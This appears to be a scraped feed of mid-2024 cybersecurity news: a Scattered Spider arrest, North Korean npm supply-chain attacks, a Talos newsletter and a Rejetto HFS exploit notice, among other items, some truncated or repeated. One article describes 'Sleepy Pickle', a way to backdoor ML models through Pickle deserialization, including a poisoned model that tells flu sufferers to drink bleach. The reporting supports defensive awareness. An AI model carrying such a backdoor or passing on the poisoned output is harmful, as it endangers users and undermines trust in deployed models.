Law enforcement authorities have allegedly arrested a key member of the notorious cybercrime group called Scattered Spider.
The individual, a 22-year-old man from the United Kingdom, was arrested this week in the Spanish city of Palma de Mallorca as he attempted to board a flight to Italy. The move is said to be a joint effort between the U.S. Federal Bureau of Investigation (FBI) and the

Law enforcement authorities have allegedly arrested a key member of the notorious cybercrime group called Scattered Spider.

The individual, a 22-year-old man from the United Kingdom, was arrested this week in the Spanish city of Palma de Mallorca as he attempted to board a flight to Italy. The move is said to be a joint effort between the U.S. Federal Bureau of Investigation (FBI) and the Spanish Police.

News of the arrest was first reported by Murcia Today on June 14, 2024, with vx-underground subsequently revealing that the apprehended party is "associated with several other high profile ransomware attacks performed by Scattered Spider."

The malware research group further said the individual was a SIM swapper who operated under the alias "Tyler." SIM-swapping attacks work by calling the telecom carrier to transfer a target's phone number to a SIM under their control with the goal of intercepting their messages, including one-time passwords (OTPs), and taking control of their online accounts.

According to security journalist Brian Krebs, Tyler is believed to be a 22-year-old from Scotland named Tyler Buchanan, who goes by the name "tylerb" on Telegram channels related to SIM-swapping.

Tyler is the second member of the Scattered Spider group to be arrested after Noah Michael Urban, who was charged by the U.S. Justice Department earlier this February with wire fraud and aggravated identity theft for offenses.

Scattered Spider, which also overlaps with activity tracked the monikers 0ktapus, Octo Tempest, and UNC3944, is a financially motivated threat group that's infamous for orchestrating sophisticated social engineering attacks to gain initial access to organizations. Members of the group are suspected to be part of a bigger cybercriminal gang called The Com.

Initially focused on credential harvesting and SIM swapping, the group has since adapted their tradecraft to focus on ransomware and data theft extortion, before shifting to encryptionless extortion attacks that aim to steal data from software-as-a-service (SaaS) applications.

"Evidence also suggests UNC3944 has occasionally resorted to fear-mongering tactics to gain access to victim credentials," Google-owned Mandiant said. "These tactics include threats of doxxing personal information, physical harm to victims and their families, and the distribution of compromising material."

Mandiant told The Hacker News the activity associated with UNC3944 exhibits some level of similarities with another cluster tracked by Palo Alto Networks Unit 42 as Muddled Libra, which has also been observed targeting SaaS applications to exfiltrate sensitive data. It, however, emphasized that they "should not be considered the 'same.'"

The names 0ktapus and Muddled Libra come from the threat actor's use of a phishing kit that's designed to steal Okta sign-in credentials and has since been put to use by several other hacking groups.

"UNC3944 has also leveraged Okta permissions abuse techniques through the self-assignment of a compromised account to every application in an Okta instance to expand the scope of intrusion beyond on-premises infrastructure to Cloud and SaaS applications," Mandiant noted.

"With this privilege escalation, the threat actor could not only abuse applications that leverage Okta for single sign-on (SSO), but also conduct internal reconnaissance through use of the Okta web portal by visually observing what application tiles were available after these role assignments."

Attack chains are characterized by the use of legitimate cloud synchronization utilities like Airbyte and Fivetran to export the data to attacker-controlled cloud storage buckets, alongside taking steps to conduct extensive reconnaissance, set up persistence through the creation of new virtual machines, and impair defenses.

Additionally, Scattered Spider has been observed making use of endpoint detection and response (EDR) solutions to run commands such as whoami and quser in order to test access to the environment.

"UNC3944 continued to access Azure, CyberArk, Salesforce, and Workday and within each of these applications conducted further reconnaissance," the threat intelligence firm said. "Specifically for CyberArk, Mandiant has observed the download and use of the PowerShell module psPAS specifically to programmatically interact with an organization's CyberArk instance."

The targeting of the CyberArk Privileged Access Security (PAS) solution has also been a pattern observed in RansomHub ransomware attacks, raising the possibility that at least one member of Scattered Spider may have turned into an affiliate for the nascent ransomware-as-a-service (RaaS) operation, according to GuidePoint Security.

The evolution of the threat actor's tactics further coincides with its active targeting of finance and insurance industries using convincing lookalike domains and login pages for credential theft.

The FBI told Reuters last month that it's laying the groundwork to charge hackers from the group that has been linked to attacks targeting over 100 organizations since its emergence in May 2022.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.K. Hacker Linked to Notorious Scattered Spider Group Arrested in Spain

A model can be perfectly innocent, yet still dangerous if the means by which it's packed and unpacked are tainted.

Source: Barry Mason via Alamy Stock Photo

Researchers have concocted a new way of manipulating machine learning (ML) models by injecting malicious code into the process of serialization.

The method focuses on the "pickling" process used to store Python objects in bytecode. ML models are often packaged and distributed in Pickle format, despite its longstanding, known risks.

As described in a new blog post from Trail of Bits, Pickle files allow some cover for attackers to inject malicious bytecode into ML programs. In theory, such code could cause any number of consequences — manipulated output, data theft, etc. — but wouldn't be as easily detected as other methods of supply chain attack.

"It allows us to more subtly embed malicious behavior into our applications at runtime, which allows us to potentially go much longer periods of time without it being noticed by our incident response team," warns David Brauchler, principal security consultant with NCC Group.

**Sleepy Pickle Poisons the ML Jar**

A so-called "Sleepy Pickle" attack is performed rather simply with a tool like Flicking. Flicking is an open source program for detecting, analyzing, reverse engineering, or creating malicious Pickle files. An attacker merely has to convince a target to download a poisoned .pkl — say via phishing or supply chain compromise — and then, upon deserialization, their malicious operation code executes as a Python payload.

Poisoning a model in this way carries a number of advantages to stealth. For one thing, it doesn't require local or remote access to a target's system, and no trace of malware is left to the disk. Because the poisoning occurs dynamically during deserialization, it resists static analysis. (A malicious model published to an AI repository like Hugging Face might be much more easily snuffed out.)

Serialized model files are hefty, so the malicious code necessary to cause damage might only represent a small fraction of the total file size. And these attacks can be customized in any number of ways that regular malware attacks are to prevent detection and analysis.

While Sleepy Pickle can presumably be used to do any number of things to a target's machine, the researchers noted, "controls like sandboxing, isolation, privilege limitation, firewalls, and egress traffic control can prevent the payload from severely damaging the user’s system or stealing/tampering with the user’s data."

More interestingly, attacks can be oriented to manipulate the model itself. For example, an attacker could insert a backdoor into the model, or manipulate its weights and, thereby, its outputs. Trail of Bits demonstrated in practice how this method can be used to, for example, suggest that users with the flu drink bleach to cure themselves. Alternatively, an infected model can be used to steal sensitive user data, add phishing links or malware to model outputs, and more.

**How to Safely Use ML Models**

To avoid this kind of risk, organizations can focus on only using ML models in the safer file format, Safetensors. Unlike Pickle, Safetensors deals only with tensor data, not Python objects, removing the risk of arbitrary code execution deserialization.

"If your organization is dead set on running models that are out there that have been distributed as a pickled version, one thing that you could do is upload it into a resource safe sandbox — say, AWS Lambda — and do a conversion on the fly, and have that produce a Safetensors version of the file on your behalf," Brauchler suggests.

But, he adds, "I think that's more of a Band-Aid on top of a larger problem. Sure, if you go and download a Safetensors file, you might have some amount of confidence that that doesn't contain malicious code. But do you trust that the individual or organization that produced this data generated a machine learning model that doesn't contain things like backdoors or malicious behavior, or any other number of issues, oversights, or malice, that your organization isn't prepared to handle?"

"I think that we really need to be paying attention to how we're managing trust within our systems," he says, and the best way of doing that is to strictly separate the data a model is retrieving from the code it uses to function. "We need to be architecting around these models such that even if they do misbehave, the users of our application and our assets within our environments are not impacted."

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

'Sleepy Pickle' Exploit Subtly Poisons ML Models

Mattermost Desktop App versions <=5.7.0 fail to disable certain Electron debug flags which allows for bypassing TCC restrictions on macOS.

**Mattermost Desktop App allows for bypassing TCC restrictions on macOS**

Low severity GitHub Reviewed Published Jun 14, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-xgqm-wp7w-mgg2: Mattermost Desktop App allows for bypassing TCC restrictions on macOS

Apple's guarantee of privacy on every AI transaction could influence trustworthy AI deployments.

Source: OleCNX via Alamy Stock Photo

Apple has long styled itself as the company that cares about privacy, and it continues to tout its privacy bona fides with Apple Intelligence.

At this week's Worldwide Developer Conference, the company announced Apple Intelligence, its secure AI system, and plans to integrate AI across its devices and applications. The AI features will be used to upgrade personal assistant features in Apple devices and provide assistance with writing and image manipulation.

While a lightweight AI model runs locally on Apple devices, more complex queries will go to the cloud. Apple will assess the complexity and computing power required by an AI query and decide whether to process it on device or send it to the cloud. Data won’t leave the device if it is processed on device, and layers of security protect the information sent to the cloud.

Within this secure AI system, user data is not visible to anyone, even Apple, and is deleted once a query is answered, the company said.

"Your data is never stored or made accessible to Apple. It's used exclusively to fulfill your request," said Craig Federighi, senior vice president of software engineering at Apple, during a WWDC keynote.

**Trusted AI Deployments?**

Apple's guarantee of privacy on every AI transaction — whether on-device or in the cloud — is ambitious and could influence trustworthy AI deployments.

Apple's hardware and software implementation to guarantee privacy on every AI transaction sets a high bar on zero-trust infrastructure that competitors may try to match, says James Sanders, an analyst at chip research firm TechInsights.

Sanders notes there is a "growing trust problem" with LLMs, especially as top AI providers collect information from users to train large-language models or improve services. Google collects user data from across its vast portfolio of products to boost its capabilities. It also includes human reviewers to evaluate answers with the ultimate goal to improve its Gemini AI service.

Apple did not announce its own AI infrastructure and instead will be integrating with OpenAI. Apple left open the possibility of working with others as well. Users will be prompted to agree to send user data to OpenAI.

"I do wonder to what extent this is going to put pressure on Microsoft to adopt a similar method," Sanders says.

**Building an AI Walled Garden**

As part of its investments, the company has built a trustworthy cloud infrastructure called Private Compute Cloud with new servers and chips to handle AI queries that demand more computing power. Apple's secure boot and secure enclaves protect data.

"These models run on servers … specially created using Apple silicon. These Apple silicon servers offer the privacy and security of your iPhone from the silicon on up," Apple’s Federighi said.

Private data can be easily stolen en route or from the cloud, but Apple is using the latest hardware and software techniques to protect the data, said Matthew Green, associate professor at Johns Hopkin’s computer science department. Apple devices generate encryption keys, which authenticates devices and cloud connections. The request is then sent to a secure enclave on Apple's servers, where the requests are processed.

Apple is also taking a serverless approach in which data is deleted once the answer is sent back. New keys are generated each time a system reboots. The operating system also has an attestation system to verify users and software images.

"Specifically, it signs a hash of the software and shares this with every phone/client. If you trust this infrastructure, you'll know it's running a specific piece of software," Green said.

Apple controls nearly every major piece of software and hardware in its infrastructure, which makes it easier for them to build a strong privacy wall around its AI service, said Alex Matrosov, CEO of security company Binarly.io.

“I really liked how they frame all the requirements and specifically use their own silicon. Once they control everything, they can guarantee the chain of trust from the silicon to the cloud,” Matrosov said.

Rival providers don’t have nearly the same level of control over their AI infrastructure. Unlike Apple, they can’t lock down security as queries pass through various hardware and software layers, Matrosov says. For example, OpenAI and Microsoft process queries through GPUs from Nvidia, which handles vulnerability discovery and patching.

"If Apple sets the standard, the effect will be 'why I should buy Android if I don’t care about the privacy.' The next step will be Google following up and trying to maybe implement or do the similar thing," Matrosov said.

**About the Author(s)**

Agam Shah has covered enterprise IT for more than a decade. Outside of machine learning, hardware, and chips, he's also interested in martial arts and Russia.

Apple's AI Offering Makes Big Privacy Promises

The recently identified threat actor uses public registries for distribution and has expanded capabilities to disrupt the software supply chain.

Source: Igor Stevanovic via Alamy Stock Photo

A newly identified North Korean threat actor has widened its distribution of malicious node package manager (npm) code to public registries. And it's differentiating itself from other state-sponsored groups as it ramps up activity to threaten the software supply chain by poisoning open source code repositories.

Moonstone Sleet first appeared on the scene late last month, when Microsoft revealed that the threat group concurrently was engaged in espionage and financial cyberattacks using a grab bag of attack techniques against aerospace, education, and software organizations and developers.

Among those techniques was to try to get hired for remote tech jobs with real companies and, in the process, spread malicious npm packages on LinkedIn and freelancer websites. Now researchers from CheckMarx have discovered that the scope of Moonstone Sleet's malicious npm package activity is wider than first reported, according to a blog post published on June 13.

The actor is "placing those malicious packages in public open source package repositories that are accessible to developers," an activity that allows the actor to expand its attack surface, Tzachi Zornstein, head of software supply chain at Checkmarx, tells Dark Reading.

"With the revelation of this new North Korean group, coupled with the recent attacks by Russian and North Korean threat actors … it has become increasingly apparent that the open-source ecosystem has become a prime target for powerful and sophisticated adversaries," Zornstein and fellow CheckMarx researcher Yehuda Gelb wrote in the post.

The researchers cite the multiyear supply chain attack that started with a backdoor implanted in the XZ Utils data compression utility to demonstrate how spreading malicious open source code can have a massive ripple effect across the security of enterprise software.

**Differentiation From Lazarus Activity**

CheckMarx also discovered how Moonstone Sleet is setting itself apart through the structure and the style of its malicious code packages from another well-known and prolific North Korean actor — Jade Sleet, better known as Lazarus — that engages in similar activity.

The newest packages published late last year and in the first quarter of 2024 show Moonstone Sleet using "a single-package approach" that executes its payload immediately upon installation, the researchers wrote.

Further, while earlier malicious payloads "included OS-specific code, executing only if it detected that it was running on a Windows machine," packages released earlier this year show the actor adding obfuscation and creating code to target Linux systems if that OS is detected by the package, the researchers revealed.

In contrast, Lazarus designed its packages, discovered in the summer of 2023, to work in pairs, with each pair being published by a separate npm user account to distribute their malicious functionality. "This approach was used in an attempt to make it more challenging to detect and trace the malicious activity back to a single source," Zornstein and Gelb wrote.

The first package from Lazarus would create a directory on the victim's machine, fetch updates from a remote server, and save them in a file within the newly created directory, while the second package would execute the malicious payload.

**Evolving Threat to Open Source Ecosystem**

The tactic of publishing malicious npm packages by North Korean threat actors in general "underscores the persistent nature of their campaign" and poses a growing risk for the open source community that depends on public registries for software development.

"By uploading those malicious packages to a public registry, the attackers abuse the trust that developers have for the open source registries," Zornstein says.

However, while the open source community plays a key role in maintaining the security and integrity of the ecosystem, the primary responsibility for ensuring the safety of the software supply chain lies with the organizations that consume these packages. That's why it's imperative for organizations to "scan the code in the packages for malicious behaviors … prior to making the code available to developers," he says.

Developers and organizations also should continue to collaborate and share information among themselves and with the security community to identify and thwart these attacks, the researchers said. "Through collective effort and proactive measures," they wrote, "we can work towards a safer and more secure open-source ecosystem for all."

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

North Korea's Moonstone Sleet Widens Distribution of Malicious Code

Experiment demonstrates how AI can turn the tables on cybercriminals, capturing bank account details of how scammers move stolen funds around the world.

Source: tanit boonruen via Alamy Stock Photo

Responding to scammers' emails and text messages typically has been the fodder of threat researchers, YouTube stunts, and even comedians.

Yet one experiment using conversational AI to answer spam messages and engage fraudsters in conversations has shown that large language models (LLMs) can interact with cybercriminals, gleaning threat intelligence by diving down the rabbit hole of financial fraud — an effort that usually requires a human threat analyst.

Over the past two years, researchers at UK-based fraud-defense firm Netcraft used a chatbot based on Open AI's ChatGPT to respond to scams and convince cybercriminals to part with sensitive information: specifically, banks account numbers at more than 600 financial institutions spanning 73 different countries that are used to transfer stolen money.

Overall, the technique allows threat analysts to extract more details about the infrastructure used by cybercriminals to con people out of their money, says Robert Duncan, vice president of product strategy for Netcraft.

"We're effectively using AI to emulate a victim, so we play along with the scam to get to the ultimate goal, which typically \[for the scammer\] is to receive money in some form," he says. "It's proven remarkably robust at adapting to different types of criminal activity ... changing behavior between something like a romance scam, which might last months, \[and\] advanced fee fraud — where you get to the end of it very quickly."

As international fraud rings are profiting from scams — especially romance and investment fraud operating out of cyber-scam centers in Southeast Asia — defenders are searching for ways to expose cybercriminals' financial and infrastructure components and shut them down. Countries, such as the United Arab Emirates, have embarked on partnerships to develop AI in ways that can improve cybersecurity. Using AI chatbots could shift the technological advantage from attackers back to defenders, a form of proactive cyber defense.

**Personas With Local Languages**

Netcraft's research shows that AI chatbots could help curb cybercrime by forcing cybercriminals to work harder. Currently, cybercriminals and fraudsters use mass email and text-messaging campaigns to cast a wide net, hoping to catch a few credulous victims from which to steal money.

The two-year research project uncovered thousands of accounts linked to fraudsters. While Duncan would not reveal the name of the banks, the scammers' accounts were mainly in the United States and the United Kingdom — likely because the personas donned by the AI chatbots were from those regions as well. Financial fraud works better when using bank accounts in the same country as the victim, he says.

The company is already seeing that distribution change, however, as it adds more languages to its chatbot's capabilities.

"When we spin up some new personas in Italy, we're now seeing more Italian accounts coming in, so it's really a function of where we're running these personas and what language we're having them speak in," he says.

The promise of using AI chatbots to engage with scammers and cybercriminals is that machines can conduct such conversations at scale. Netcraft has bet on the technology as a way to acquire threat intelligence that would not otherwise be available, announcing its Conversational Scam Intelligence service at the RSA Conference in May.

**AI on AI**

Typically, scammers attempt to convince the victims to buy cryptocurrency or gift cards as the preferred way of payment, but eventually hand over bank account information, according to Netcraft. The goal in using an AI chatbot is to keep the conversation going long enough to reach those milestones. The average conversation results in cybercriminals sending 32 messages and the chatbot issuing 15 replies.

When the AI chatbot system succeeds, it can harvest important threat data from cybercriminals. In one case, a scammer promising an inheritance of $5 million to the "victim" sent information on 17 different accounts at 12 different banks in an attempt to complete the transfer of an initial fee. Other fraudsters have impersonated specific banks, such as Deutsche Bank and the Central Bank of Nigeria, to convince the "victim" to transfer money. The chatbot duly collected all the information. 

While Netcraft's current focus with the experiment is to gain in-depth threat intelligence, the platform could be operationalized to engage fraudsters on a larger scale, flipping the current asymmetry between attackers and defenders. Rather than attackers using automation to increase the workload on defenders, a conversational system could widely engage cybercriminals, forcing them to have to figure out which conversations are real and which are not.

Such an approach holds promise, especially since attackers are starting to adopt AI in new ways as well, Duncan says.

"We've definitely seen indicators that attackers are sending texts that resemble the type of texts that ChatGPT puts out," he says. "Again, it's very hard to be certain, but we would be very surprised if we weren't already talking back to AI, and essentially we have an AI-on-AI conversation."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

AI Chatbot Fools Scammers &amp; Scores Money-Laundering Intel

A botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group.

Thursday, June 13, 2024 14:00

As I covered in last week’s newsletter, law enforcement agencies from around the globe have been touting recent botnet disruptions affecting the likes of some of the largest threat actors and malware families.  

Operation Endgame, which Europol touted as the “largest ever operation against botnets,” targeted malware droppers including the IcedID banking trojan, Trickbot ransomware, the Smokeloader malware loader, and more.  

A separate disruption campaign targeted a botnet called “911 S5,” which the FBI said was used to “commit cyber attacks, large-scale fraud, child exploitation, harassment, bomb threats, and export violations.” 

But with these types of announcements, I think there can be confusion about what a botnet disruption means, exactly. As we’ve written about before in the case of the LockBit ransomware, botnet and server disruptions can certainly cause headaches for threat actors, but usually are not a complete shutdown of their operations, forcing them to go offline forever.  

I’m not saying that Operation Endgame and the 911 S5 disruption aren’t huge wins for defenders, but I do think it’s important to separate botnets from the malware and threat actors themselves.  

For the uninitiated, a botnet is a network of computers or other internet-connected devices that are infected by malware and controlled by a single threat actor or group. Larger botnets are often used to send spam emails in large volumes or carry out distributed denial-of-service attacks by using a mountain of IP addresses to send traffic to a specific target all in a short period. Smaller botnets might be used in targeted network intrusions, or financially motivated botnet controllers might be looking to steal money from targets. 

When law enforcement agencies remove devices from these botnets, it does disrupt actors’ abilities to carry out these actions, but it’s not necessarily the end of the final payload these actors usually use, such as ransomware.  

When discussing this topic in relation to the Volt Typhoon APT, Kendall McKay from our threat intelligence team told me in the latest episode of Talos Takes that botnets should be viewed as separate entity from a malware family or APT. In the case of Volt Typhoon, the FBI said earlier this year it had disrupted the Chinese APT’s botnet, though McKay said “we’re not sure yet” if this has had any tangible effects on their operations. 

With past major botnet disruptions like Emotet and other Trickbot efforts, she also said that “eventually, those threats re-emerge, and the infected devices re-propagate \[because\] they have worm-like capabilities.” 

So, the next time you see headlines about a botnet disruption, know that yes, this is good news, but it’s also not time to start thinking the affected malware is gone forever.  

**The one big thing **

This week, Cisco Talos disclosed a new malware campaign called “Operation Celestial Force” running since at least 2018. It is still active today, employing the use of GravityRAT, an Android-based malware, along with a Windows-based malware loader we track as “HeavyLift.” Talos attributes this operation with high confidence to a Pakistani nexus of threat actors we’re calling “Cosmic Leopard,” focused on espionage and surveillance of their targets.  

**Why do I care? **

While this operation has been active for at least the past six years, Talos has observed a general uptick in the threat landscape in recent years, with respect to the use of mobile malware for espionage to target high-value targets, including the use of commercial spyware. There are two ways that this attacker commonly targets users to be on the lookout for: One is spearphishing emails that look like they’re referencing legitimate government-related documents and issues, and the other is social media-based phishing. Always be vigilant about anyone reaching out to you via direct messages on platforms like Twitter and LinkedIn.  

**So now what? **

Adversaries like Cosmic Leopard may use low-sophistication techniques such as social engineering and spear phishing, but will aggressively target potential victims with various TTPs. Therefore, organizations must remain vigilant against such motivated adversaries conducting targeted attacks by educating users on proper cyber hygiene and implementing defense in depth models to protect against such attacks across various attack surfaces. 

**Top security headlines of the week **

**Microsoft announced changes to its Recall AI service after privacy advocates and security engineers warned about the potential privacy dangers of such a feature.** The Recall tool in Windows 11 takes continuous screenshots of users’ activity which can then be queried by the user to do things like locate files or remember the last thing they were working on. However, all that data collected by Recall is stored locally on the device, potentially opening the door to data theft if a machine were to be compromised. Now, Recall will be opt-in only, meaning it’ll be turned off by default for users when it launches in an update to Windows 11. The feature will also be tied to the Windows Hello authentication protocol, meaning anyone who wants to look at their timeline needs to log in with face or fingerprint ID, or a unique PIN. After Recall’s announcement, security researcher Kevin Beaumont discovered that the AI-powered feature stored data in a database in plain text. That could have made it easy for threat actors to create tools to extract the database and its contents. Now, Microsoft has also made it so that these screenshots and the search index database are encrypted, and are only decrypted if the user authenticates. (The Verge, CNET) 

**A data breach affecting cloud storage provider Snowflake has the potential to be one of the largest security events ever** if the alleged number of affected users is accurate. Security researchers helping to address the attack targeting Snowflake said this week that financially motivated cybercriminals have stolen “a significant volume of data” from hundreds of customers. As many as 165 companies that use Snowflake could be affected, which is notable because Snowflake is generally used to store massive volumes of data on its servers. Breaches affecting Ticketmaster, Santander bank and Lending Tree have already been linked to the Snowflake incident. Incident responders working on the breach wrote this week that the attackers used stolen credentials to access customers’ Snowflake instances and steal valuable data. The activity dates back to at least April 14. Reporters at online news outlet TechCrunch also found that hundreds of Snowflake customer credentials were available on the dark web, after malware infected Snowflake staffers’ computers. The list poses an ongoing risk to any Snowflake users who had not changed their passwords as of the first disclosure of this breach or are not protected by multi-factor authentication. (TechCrunch, Wired) 

**Recovery of a cyber attack affecting several large hospitals in London could take several months to resolve, according to an official with the U.K.’s National Health Service.** The affected hospitals and general practitioners’ offices serve a combined 2 million patients. A recent cyber attack targeting a private firm called Synnovis that analyzes blood tests has forced these offices to reschedule appointments and cancel crucial surgeries. “It is unclear how long it will take for the services to get back to normal, but it is likely to take many months,” the NHS official told The Guardian newspaper. Britain also had to put out a call for volunteers to donate type O blood as soon as possible, as the attack has made it more difficult for health care facilities to match patients’ blood types at the same frequency as usual. Type O blood is generally known to be safe for all patients and is commonly used in major surgeries. (BBC, The Guardian) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #186: A mid-year checkin on Volt Typhoon 
*   LilacSquid APT Employs Open Source Tools, QuasarRAT 
*   Cisco Finds 15 Vulnerabilities in AutomationDirect PLCs 

**Upcoming events where you can find Talos **

**_Cisco Connect U.K._** **_(June 25)_**

_London, England_

> _In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe._

**_BlackHat USA_** **_(Aug. 3 – 8)_** 

_Las Vegas, Nevada_ 

**_Defcon_** **_(Aug. 8 – 11)_** 

_Las Vegas, Nevada_ 

**_BSides Krakow_** **_(Sept. 14)_**  

_Krakow, Poland_ 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** 2d1a07754e76c65d324ab8e538fa74e5d5eb587acb260f9e56afbcf4f4848be5   
**MD5:** d3ee270a07df8e87246305187d471f68   
**Typical Filename:** iptray.exe   
**Claimed Product:** Cisco AMP   
**Detection Name:** Generic.XMRIGMiner.A.A13F9FCC

**SHA 256:** 9b2ebc5d554b33cb661f979db5b9f99d4a2f967639d73653f667370800ee105e   
**MD5:** ecbfdbb42cb98a597ef81abea193ac8f   
**Typical Filename:** N/A   
**Claimed Product:** MAPIToolkitConsole.exe   
**Detection Name:** Gen:Variant.Barys.460270 

**SHA 256:** 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202   
**MD5:** e4acf0e303e9f1371f029e013f902262   
**Typical Filename:** FileZilla\_3.67.0\_win64\_sponsored2-setup.exe   
**Claimed Product:** FileZilla   
**Detection Name:** W32.Application.27hg.1201 

**SHA 256:** a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0   
**MD5:** b4440eea7367c3fb04a89225df4022a6   
**Typical Filename:** Pdfixers.exe   
**Claimed Product:** Pdfixers   
**Detection Name:** W32.Superfluss:PUPgenPUP.27gq.1201 

**SHA 256:** 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647   
**MD5:** bbcf7a68f4164a9f5f5cb2d9f30d9790   
**Typical Filename:** bbcf7a68f4164a9f5f5cb2d9f30d9790.vir   
**Claimed Product:** N/A   
**Detection Name:** Win.Dropper.Scar::1201

How we can separate botnets from the malware operations that rely on them

The security risks posed by the Pickle format have once again come to the fore with the discovery of a new "hybrid machine learning (ML) model exploitation technique" dubbed Sleepy Pickle.
The attack method, per Trail of Bits, weaponizes the ubiquitous format used to package and distribute machine learning (ML) models to corrupt the model itself, posing a severe supply chain risk to an

New Attack Technique 'Sleepy Pickle' Targets Machine Learning Models

Strong partnerships and collaborations between industry and law enforcement are the most critical ways to take down cybercrime groups before they grow.

Sean M. McNee, Vice President of Research & Data, DomainTools

June 13, 2024

4 Min Read

Source: Igor Stevanovic via Alamy Stock Photo

COMMENTARY

It appears that 2024 could be the year of the cybercrime takedown. The most high-profile takedown so far this year, LockBit, was an international news story that broke the back of the so-called "most harmful cybercrime group." This was followed up shortly by the takedown of ALPHV/BlackCat.

However, for every takedown, there is an equivalent cybercrime "startup." Here's how such organizations emerge and function. 

**Developing a Business Model **

When viewed through a dispassionate lens, cybercrime groups aren't that dissimilar from startups. The successful ones stay keenly focused on what their customers want and which markets and trends are ripe for disruption, and move fast to secure their advantages — even though these groups operate within a shadow economy that, despite being presumably hidden and illegal, is still an economy. It has all of the same financial dynamics, complex business interactions, and market forces as any other economy. 

Since these cybercrime groups operate outside the law, they are able to "innovate'' independent of any external regulations. They can pivot to target new industries rapidly, or pivot technologies or processes when they determine the financial payout is worth it. This freedom allows a highly motivated group to remain ahead of law enforcement and their targets. The savviest cybercrime groups don't change their technology because they want to, however, they change in response to market forces.

**The Manipulaters: A Case Study **

The maturation of a cybercrime gang and its associated crimeware tools does not happen in a vacuum. It happens in the context of a community of financially motivated individuals. In the case of the recently documented recently documented Manipulaters, the group leveraged the variety of unmet needs by their customers to move laterally into different markets. The storefronts that the Manipulaters created demonstrated "social proof" of their value and followed a predictable pattern: A store would start with spam tooling and services, move to phishing kits, and eventually expand into off-the-shelf malware. Each time, the Manipulaters would refine its business models: who it sold to, what its pricing model was, and the specific services it offered. Even with these innovations, spam services remained its core business, with the most consistent profits, especially from West African clientele.

The considerable scale of its operation is nothing compared to its position as one of the "innovators'' in the cybercrime space. Its now defunct primary shop, Fresh Spam Tools, was one of the earliest large spam- and phishing-focused cybercrime marketplaces. The cybercrime marketplaces online today are a result of this "innovation" — there's good money to be made enabling others to perform cybercrime. By pioneering this business model, the Manipulaters lowered technical barriers to entry and expanded Internet crime. What this group may lack in technical talent, it more than makes up for in opportunism and business savvy, leading to its financial success.

**Shifting Response Strategies **

Groups like LockBit, the Manipulaters, and others may find themselves battling changing strategies from law enforcement disrupting their activities. Recent amendments to the US Federal Rules of Criminal Procedure, including a specific change to Rule 41, broadens courts' jurisdictions to issue remote search warrants when the location of a sought-after device or data has been concealed due to technological means. This change, in alignment with the provisions of the Budapest Convention, has created the legal framework and tools required for international law enforcement coalitions to go after and take down cybercrime groups. The LockBit and ALPHV/BlackCat takedowns were enabled by these changes.

While this helps curtail illegal activity online, some privacy advocates are concerned. "Hard cases make bad law," so these takedown precedents should be considered carefully. There appears to be an operational delineation between "illegal code" placed into US-owned hardware by foreign actors, for example, compared to similar actions undertaken by domestic actors. Ultimately, Congress will need to step in and provide additional rules and guidelines for how to align potential domestic takedown cases with Fourth Amendment rights. 

**Tracking Infrastructure to Prevent Empires**

Law enforcement takedowns depend on timely, accurate, and actionable information, both on who the actors are and where their infrastructure is located. Internet infrastructure — IP addresses, email, and especially DNS — is key, as bad actors must be online to cause harm, thus we can track them. The research and knowledge generated by the security industry builds up a clear picture of the activities of cybercriminal networks. Therefore, ensuring a strong partnership and collaboration between industry and law enforcement is the most critical way to identify, mitigate, and take down cybercrime groups such as LockBit and ALPHV/BlackCat before they have a chance to become an empire. 

**About the Author(s)**

Vice President of Research & Data, DomainTools

Sean M. McNee is Vice President of Research and Data at DomainTools. Over his career, Sean has harnessed the power of machine learning and visual analytics to help people — including academics, lawyers, and threat hunters — find the information they need to make better decisions. He looks for ways to make the Internet a better place, with a focus on Internet infrastructure, such as domain registration and DNS data analysis. A winner of the 2010 ACM Software Systems Award, Sean received his doctoral degree from the University of Minnesota, where he researched personalization and recommender systems.

How Cybercrime Empires Are Built

The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges of the user account running the HFS.exe server process. This exploit has been tested to work against version 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers and no patch is available. Users are recommended to upgrade to newer supported versions.

